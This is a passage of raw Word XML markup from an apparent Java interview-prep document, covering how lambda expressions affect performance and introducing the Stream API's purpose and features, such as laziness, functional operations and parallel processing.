          <w:p w14:paraId="09276ED6" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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mpact on Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="4283F58E" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FA22F6A"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duced Boilerplate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C01F796"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duces code size, memory usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="7F3F2A81" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B702E0A"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azy Evaluation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79A30D39"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an improve performance in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>stream</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="46774249" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="354E9F29"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rallel Streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="243CAAF5"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leverage multiple cores for improved performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="7E615D01" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6836B6B8"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VM Optimization (invokedynamic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160CA6A2"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lead to more efficient method calls in some scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="6A1D7D05" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7839EC7E"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Overhead (first execution)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="613284CC"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rginal, typically negligible after first execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08520CC6" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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4C94DF6">
          <v:rect id="_x0000_i1771" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC0C73E" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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 Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A88205" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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ile </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> themselves don't provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>direct performance boosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, their usage encourages more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming paradigms</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., using streams and parallelism), which </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can improve performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the right scenarios, especially for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data-heavy tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The overall </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>readability</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reduced boilerplate</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JVM optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> make lambda expressions a powerful tool in Java development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79731475" w14:textId="02A92529" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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04DC5C6">
          <v:rect id="_x0000_i1772" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF4A760" w14:textId="77777777" w:rsidR="00500D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00500D6E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="_Toc196307725"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you elaborate on the Stream API, purpose and use of it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
    </w:p>
    <w:p w14:paraId="55BA5E81" w14:textId="733AFF58" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream API in Java: Purpose and Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C850A7"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stream API</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a part of the java.util.stream package. It represents a sequence of elements that can be processed in </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sequential</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and provides a higher-level abstraction for working with sequences of data. The Stream API allows for more concise, readable, and efficient data manipulation compared to traditional iteration (using for loops).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CB160C"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Let's dive deeper into its </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common use cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E199C1B" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Purpose of the Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7786982A"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The main purpose of the Stream API is to facilitate </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on collections of data. It enables you to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018873BB" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>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Process sequences of elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a declarative way (instead of using explicit iteration and conditional statements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC72C5" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>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Allow parallel execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for better performance, especially when dealing with large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BE55B" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>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lastRenderedPageBreak/>
        <w:t>Support functional programming paradigms</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, making code more concise, expressive, and readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207AA7C1" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Main Features of Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C826CD5" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>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Sequence of Elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A stream is a sequence of data elements that can be processed using a series of operations, such as map, filter, and reduce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5295F96D" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>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Laziness</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Operations on streams are </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default. That means computations are not executed until a terminal operation (like collect, forEach, or reduce) is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8EA077" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>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Functional Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The Stream API provides functional-style operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reduce</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flatMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making the code more readable and concise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AED537" w14:textId="77777777" w:rsidR="00E641A5" w:rsidRPr="00397A42" w:rsidRDefault="00E641A5" w:rsidP="00397A42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>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Parallel Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00397A42">
        <w:rPr>
